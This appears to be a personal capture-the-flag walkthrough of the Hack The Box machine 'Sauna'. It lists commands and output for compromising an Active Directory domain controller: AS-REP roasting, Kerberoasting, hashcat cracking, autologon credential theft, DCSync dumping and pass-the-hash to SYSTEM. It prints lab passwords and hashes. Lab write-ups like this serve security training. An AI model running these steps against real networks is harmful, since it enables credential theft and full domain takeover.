nmap

nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 18:33 EST
Stats: 0:02:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 18:36 (0:00:00 remaining)
Nmap scan report for 10.10.10.175
Host is up (0.022s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-21 06:34:48Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-21T06:35:45
|_  start_date: N/A
|_clock-skew: 7h00m02s
 
TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   18.55 ms 10.10.14.1
2   18.60 ms 10.10.10.175
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.02 seconds

80

80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE

buster

feroxbuster -u http://10.10.10.175
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.175
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      150c http://10.10.10.175/images => http://10.10.10.175/images/
301      GET        2l       10w      147c http://10.10.10.175/css => http://10.10.10.175/css/
200      GET     2337l     3940w    37414c http://10.10.10.175/css/font-awesome.css
200      GET      385l     1324w    14226c http://10.10.10.175/css/slider.css
200      GET      640l     1767w    30954c http://10.10.10.175/about.html
200      GET      683l     1813w    32797c http://10.10.10.175/index.html
200      GET      325l      770w    15634c http://10.10.10.175/contact.html
200      GET     2168l     4106w    37019c http://10.10.10.175/css/style.css
200      GET      111l      661w    50106c http://10.10.10.175/images/t1.jpg
200      GET      470l     1279w    24695c http://10.10.10.175/blog.html
200      GET      144l      850w    71769c http://10.10.10.175/images/t2.jpg
200      GET      684l     1814w    38059c http://10.10.10.175/single.html
200      GET      122l      750w    60163c http://10.10.10.175/images/t4.jpg
200      GET      138l      940w    76395c http://10.10.10.175/images/t3.jpg
200      GET      389l     1987w   159728c http://10.10.10.175/images/ab.jpg
301      GET        2l       10w      150c http://10.10.10.175/Images => http://10.10.10.175/Images/
200      GET      268l     2037w   191775c http://10.10.10.175/images/skill2.jpg
200      GET      657l     3746w   345763c http://10.10.10.175/images/skill1.jpg
200      GET     8975l    17530w   178152c http://10.10.10.175/css/bootstrap.css
200      GET      683l     1813w    32797c http://10.10.10.175/
301      GET        2l       10w      149c http://10.10.10.175/fonts => http://10.10.10.175/fonts/
301      GET        2l       10w      147c http://10.10.10.175/CSS => http://10.10.10.175/CSS/
301      GET        2l       10w      147c http://10.10.10.175/Css => http://10.10.10.175/Css/
301      GET        2l       10w      150c http://10.10.10.175/IMAGES => http://10.10.10.175/IMAGES/
301      GET        2l       10w      149c http://10.10.10.175/Fonts => http://10.10.10.175/Fonts/
400      GET        6l       26w      324c http://10.10.10.175/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/images/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/CSS/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/css/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/Images/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/fonts/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/Css/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/IMAGES/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/Fonts/error%1F_log
[####################] - 83s   270038/270038  0s      found:34      errors:2      
[####################] - 81s    30000/30000   372/s   http://10.10.10.175/ 
[####################] - 80s    30000/30000   373/s   http://10.10.10.175/images/ 
[####################] - 80s    30000/30000   373/s   http://10.10.10.175/css/ 
[####################] - 80s    30000/30000   374/s   http://10.10.10.175/Images/ 
[####################] - 81s    30000/30000   372/s   http://10.10.10.175/fonts/ 
[####################] - 79s    30000/30000   379/s   http://10.10.10.175/CSS/ 
[####################] - 79s    30000/30000   378/s   http://10.10.10.175/Css/ 
[####################] - 78s    30000/30000   385/s   http://10.10.10.175/IMAGES/ 
[####################] - 75s    30000/30000   399/s   http://10.10.10.175/Fonts/

445

445/tcp   open  microsoft-ds?

smbclient -N -L \\\\10.10.10.175
Anonymous login successful
 
	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smbclient -N -L \\\\10.10.10.175 -U 'guest'
session setup failed: NT_STATUS_LOGON_FAILURE

rpcclient

rpcclient -U "" 10.10.10.175
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

cat users.txt
Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver

/opt/username-anarchy/username-anarchy -i users.txt
fergus
fergussmith
fergus.smith
fergussm
fergsmit
ferguss
f.smith
fsmith
sfergus
s.fergus
smithf
smith
smith.f
smith.fergus
fs
hugo
hugobear
hugo.bear
hugob
h.bear
hbear
bhugo
b.hugo
bearh
bear
bear.h
bear.hugo
hb
steven
stevenkerb
steven.kerb
stevenke
stevkerb
stevenk
s.kerb
skerb
ksteven
k.steven
kerbs
kerb
kerb.s
kerb.steven
sk
shaun
shauncoins
shaun.coins
shauncoi
shaucoin
shaunc
s.coins
scoins
cshaun
c.shaun
coinss
coins
coins.s
coins.shaun
sc
bowie
bowietaylor
bowie.taylor
bowietay
bowitayl
bowiet
b.taylor
btaylor
tbowie
t.bowie
taylorb
taylor
taylor.b
taylor.bowie
bt
sophie
sophiedriver
sophie.driver
sophiedr
sophdriv
sophied
s.driver
sdriver
dsophie
d.sophie
drivers
driver
driver.s
driver.sophie
sd

kerbrute

kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 potential_usernames.txt
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: dev (9cfb81e) - 01/20/25 - Ronnie Flathers @ropnop
 
2025/01/20 18:47:08 >  Using KDC(s):
2025/01/20 18:47:08 >  	10.10.10.175:88
 
2025/01/20 18:47:08 >  [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:7dd9ca66...$6dc6ce60ed7f7f79cb7cb9ab8f822d29900c78da59b30a65b4e2ef2caa67feecac23a14734704122782944c647bd87ab89bc34221334cf61a056785d46d5e3b18d17783e867e70e8ec6d2569566445d270ffe7cfde1cb3b08f5b33c1ea7469f05fcd981269e0dbbbe4deb148e6e43748035c19346ee2b7f7977cd5456c60a5451d5ffb9b4ec22c0e34cebbb0f2d8875d12a471d19f7d691607b7582da14f48252d282c3422943e4bb5e89137a586fd83b447ae0d10ee18f0494ac8bf647b32d26d48ba38bae1e642987eeb6f021d33a76c2fac359f3bd4bb51932180301ada5f1c03b3643ff346510161998e1b02a9488b768971159344a36e2c2c8b3538f24daa54b5ee24ecf8e01b634755e89c4e755a5135e9479f
2025/01/20 18:47:08 >  [+] VALID USERNAME:	 fsmith@EGOTISTICAL-BANK.LOCAL

asrep

kerbrute hash

GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -no-pass -usersfile potential_usernames.txt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:60691c66...$f86389b730723e0f84d43b4bfc12cf54a78a6b6624f48cf77b5d59d4f1bcabd8b6beebebde9d7d95037c1db7a0cc2c05c9e97c216bbaa79a4300cbf419481e4e582f9d0827bc42d7d9b0d2d9cde7b42f69430192138302ff80f60bebefa973c148f95ce1b662e7c2b8eb6532073d91bd37fd6623da8071824730f1cd0cfd820e66b8655747e031304f43457a8c88f6fcfaab70a869c0adea203a5b79c6960a909ab67db123cee8582a56ee545c287791a1fbeeaea828d1be39477808a0c1d5ad6ab8fde0dffa40cef886218ce265d00a657f98388932e7827582c27d89340ee087ec82176477ea2d11710878ef50e70654d7aba25b4b57c2214eafc6731b2f37

hashcat -m 18200 fsmith_asrep.txt /usr/share/wordlists/rockyou.txt                                         
 
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:60691c66...$f86389b730723e0f84d43b4bfc12cf54a78a6b6624f48cf77b5d59d4f1bcabd8b6beebebde9d7d95037c1db7a0cc2c05c9e97c216bbaa79a4300cbf419481e4e582f9d0827bc42d7d9b0d2d9cde7b42f69430192138302ff80f60bebefa973c148f95ce1b662e7c2b8eb6532073d91bd37fd6623da8071824730f1cd0cfd820e66b8655747e031304f43457a8c88f6fcfaab70a869c0adea203a5b79c6960a909ab67db123cee8582a56ee545c287791a1fbeeaea828d1be39477808a0c1d5ad6ab8fde0dffa40cef886218ce265d00a657f98388932e7827582c27d89340ee087ec82176477ea2d11710878ef50e70654d7aba25b4b57c2214eafc6731b2f37:Thestrokes23

creds

fsmith:Thestrokes23

nxc smb 10.10.10.175 -u fsmith -p 'Thestrokes23'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23

nxc winrm 10.10.10.175 -u fsmith -p 'Thestrokes23'
WINRM       10.10.10.175    5985   SAUNA            [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

winrm

evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23

evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith

user.txt

*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
f26ad217...

bloodhound

sudo bloodhound-python -u 'fsmith' -p 'Thestrokes23' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c all

zip -r EGOTISTICAL-BANK.LOCAL.zip *.json

sudo neo4j console
sudo bloodhound

kerberoastable

kerberoasting

sudo timedatectl set-ntp off                                                          
 
sudo ntpdate 10.10.10.175 & GetUserSPNs.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith -request-user hsmith 
[1] 1334773
2025-01-21 02:20:05.837534 (-0500) +25203.133355 +/- 0.010115 10.10.10.175 s1 no-leap
CLOCK: time stepped by 25203.133355
[1]  + done       sudo ntpdate 10.10.10.175
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 00:54:34.140321  <never>               
 
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$f2d351a2...$3f2d88160258b53901293cc9eff4a94f6c01107eb93624934f9035d51ad6eecb622d21e95930e5a634f14f6e7559dd89fdb2bfac8babad323573a843eec04f4970df223e3ad851bcb6dd92e87ee64ae13cdef85e49716680bb9c55336d01b0edc71537b6cdef3bd2f6386131d9cdfbe4ed9269b21ad7df7382f8d24461d11fc19410528ae3314890f59eef71b75c46fcffc4f513b2aa4ef514a2ae82d665a4623868608af6083d8df2aa6e30dbcaa4090adc3fe91bf5a118b4a8e5d8053d32a2d4b8e7f56db3eda38cd39dc224575e03bc7b29e18a645d2925dbe812007c8d5ba56323d1186f2903f71ce9a1c94df57ec5ecb4ebc2c499f1fe739aebabc5ac57fcde7af70d781cd51fd9360640e7c641ff087de70865c91617fdbe32b1c6fe7cd7e94181b62a2125eac033afb6b2901fa0fb861738b196822e60ffc06f73879be95ad724c72833920bff263154d18c1ba34295aed94848a7fb606b88fcf8ebbf6faed3cddb41e81dd7b4f9d595df1dd9e4a12c7455a538d1a723c7a8d63b6266d19c9a497bdedd69c6ca29ebfae198b194e09689837d6e13c9c545152b40f26c9842ffd3a9a05f80e88a3f0b51b5735648de034af726531dc7f0aaac28578fe51f4700678407a67cd8e6f10564c6fcde7cd12ad30547262c8bbe4c1e6fac316baba2922ec24857fa8c622811cbf0b2f7de837794f65625e80b29801c561f2d694f49ff2e51372acc1ab96670f28ae92d4319f80f8c46a59f746323a699fb2ae3213cdd234ee2cc8eb857e913d907db56df9c42422143b0ef349c9d2cc747463036b927c624f49e9b58c5faf8ecc5a8b940ba22570702ef84fd7a00f401f3657f2633cd6788ca340a82bb9a36de2d2a46acc73fc903e4966fa9b423e7a305c4bdcba80ed20b7223c5c544fac80edf39b5dca31c54924246b5cf0aeb3b703c7bbbf7f8d1e021e5ef29263946d5514bf4b3e821dfe01723d8a9e4dfc815c41c62b41280b6b1b20acfd0c53d4b520d65bbf15859c3883d903853c317344c81296da6e594d0e04c953b648a485d9d73abe52f0939bafc91b09520a53ac72ba3a74d4b6c4000a94d9f312538b22bfe59ca84af6d0d11040150ad1d9e9b98b12e0670d2359c2e41c10e1010ce3cf237c1d5a1aa3ea0cc2e4c4ad2e6adbade4af189a2d05803332bb393e46880159b7d9834311d634c1c924865c430bd80b632b83d93fdaa32926bfeb6ece8ae925ba69a785345854ed5b41b8ccb8c4665750bae2e45bd8edd21cc8e499e06e5d8b30d421e13772df2fb9e93d6eeefdfab5ea5cafee166ca599b657e2f968bdf3da618c35880a396e95f24380d1700e5256129a78a51fd5093480f8a26fdb534be570fd334f9fe12c634d41816ffe37db069dfb4f36f55d35cedfc47

code

 hashcat -m 13100 hsmith.tgs /usr/share/wordlists/rockyou.txt


$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$f2d351a2...$3f2d88160258b53901293cc9eff4a94f6c01107eb93624934f9035d51ad6eecb622d21e95930e5a634f14f6e7559dd89fdb2bfac8babad323573a843eec04f4970df223e3ad851bcb6dd92e87ee64ae13cdef85e49716680bb9c55336d01b0edc71537b6cdef3bd2f6386131d9cdfbe4ed9269b21ad7df7382f8d24461d11fc19410528ae3314890f59eef71b75c46fcffc4f513b2aa4ef514a2ae82d665a4623868608af6083d8df2aa6e30dbcaa4090adc3fe91bf5a118b4a8e5d8053d32a2d4b8e7f56db3eda38cd39dc224575e03bc7b29e18a645d2925dbe812007c8d5ba56323d1186f2903f71ce9a1c94df57ec5ecb4ebc2c499f1fe739aebabc5ac57fcde7af70d781cd51fd9360640e7c641ff087de70865c91617fdbe32b1c6fe7cd7e94181b62a2125eac033afb6b2901fa0fb861738b196822e60ffc06f73879be95ad724c72833920bff263154d18c1ba34295aed94848a7fb606b88fcf8ebbf6faed3cddb41e81dd7b4f9d595df1dd9e4a12c7455a538d1a723c7a8d63b6266d19c9a497bdedd69c6ca29ebfae198b194e09689837d6e13c9c545152b40f26c9842ffd3a9a05f80e88a3f0b51b5735648de034af726531dc7f0aaac28578fe51f4700678407a67cd8e6f10564c6fcde7cd12ad30547262c8bbe4c1e6fac316baba2922ec24857fa8c622811cbf0b2f7de837794f65625e80b29801c561f2d694f49ff2e51372acc1ab96670f28ae92d4319f80f8c46a59f746323a699fb2ae3213cdd234ee2cc8eb857e913d907db56df9c42422143b0ef349c9d2cc747463036b927c624f49e9b58c5faf8ecc5a8b940ba22570702ef84fd7a00f401f3657f2633cd6788ca340a82bb9a36de2d2a46acc73fc903e4966fa9b423e7a305c4bdcba80ed20b7223c5c544fac80edf39b5dca31c54924246b5cf0aeb3b703c7bbbf7f8d1e021e5ef29263946d5514bf4b3e821dfe01723d8a9e4dfc815c41c62b41280b6b1b20acfd0c53d4b520d65bbf15859c3883d903853c317344c81296da6e594d0e04c953b648a485d9d73abe52f0939bafc91b09520a53ac72ba3a74d4b6c4000a94d9f312538b22bfe59ca84af6d0d11040150ad1d9e9b98b12e0670d2359c2e41c10e1010ce3cf237c1d5a1aa3ea0cc2e4c4ad2e6adbade4af189a2d05803332bb393e46880159b7d9834311d634c1c924865c430bd80b632b83d93fdaa32926bfeb6ece8ae925ba69a785345854ed5b41b8ccb8c4665750bae2e45bd8edd21cc8e499e06e5d8b30d421e13772df2fb9e93d6eeefdfab5ea5cafee166ca599b657e2f968bdf3da618c35880a396e95f24380d1700e5256129a78a51fd5093480f8a26fdb534be570fd334f9fe12c634d41816ffe37db069dfb4f36f55d35cedfc47:Thestrokes23

creds

hsmith:Thestrokes23

nxc smb 10.10.10.175 -u hsmith -p 'Thestrokes23'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\hsmith:Thestrokes23

nxc smb 10.10.10.175 -u hsmith -p 'Thestrokes23' --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\hsmith:Thestrokes23 
SMB         10.10.10.175    445    SAUNA            [*] Enumerated shares
SMB         10.10.10.175    445    SAUNA            Share           Permissions     Remark
SMB         10.10.10.175    445    SAUNA            -----           -----------     ------
SMB         10.10.10.175    445    SAUNA            ADMIN$                          Remote Admin
SMB         10.10.10.175    445    SAUNA            C$                              Default share
SMB         10.10.10.175    445    SAUNA            IPC$            READ            Remote IPC
SMB         10.10.10.175    445    SAUNA            NETLOGON        READ            Logon server share 
SMB         10.10.10.175    445    SAUNA            print$          READ            Printer Drivers
SMB         10.10.10.175    445    SAUNA            RICOH Aficio SP 8300DN PCL 6 WRITE           We cant print money
SMB         10.10.10.175    445    SAUNA            SYSVOL          READ            Logon server share

winpeas

Autologon credentials

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

*Evil-WinRM* PS C:\Users\FSmith\Documents> net user /domain
 
User accounts for \\
 
-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

nxc smb 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!

creds

svc_loanmgr:Moneymakestheworldgoround!

winrm

nxc winrm 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
WINRM       10.10.10.175    5985   SAUNA            [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)

evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'

DCSync

impacket-secretsdump 'EGOTISTICAL-BANK.LOCALl'/'svc_loanmgr':'Moneymakestheworldgoround!'@'10.10.10.175'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435...:82345207...:::
Guest:501:aad3b435...:31d6cfe0...:::
krbtgt:502:aad3b435...:4a889942...:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435...:58a52d36...:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435...:58a52d36...:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435...:9cb31797...:::
SAUNA$:1000:aad3b435...:f96e2380...:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c...
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894d...
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b0...
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b0744...
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31...
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:de6dc38f62b196b8c5fe9a98e6a883e17558431c71e41e3a1a103a8b8ac5d7ed
SAUNA$:aes128-cts-hmac-sha1-96:3fda1ccf...
SAUNA$:des-cbc-md5:104c515b86739e08

impacket-psexec administrator@10.10.10.175 -hashes :82345207...
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file JnTHYKTA.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service DjUm on 10.10.10.175.....
[*] Starting service DjUm.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system

root.txt

C:\Users\Administrator\Desktop> type root.txt
7c7a9782...

HTB — Sauna

nmap

80

buster

445

rpcclient

kerbrute

asrep

creds

winrm

user.txt

bloodhound

kerberoastable

kerberoasting

creds

hsmith share

winpeas

Autologon credentials

creds

winrm

DCSync

root.txt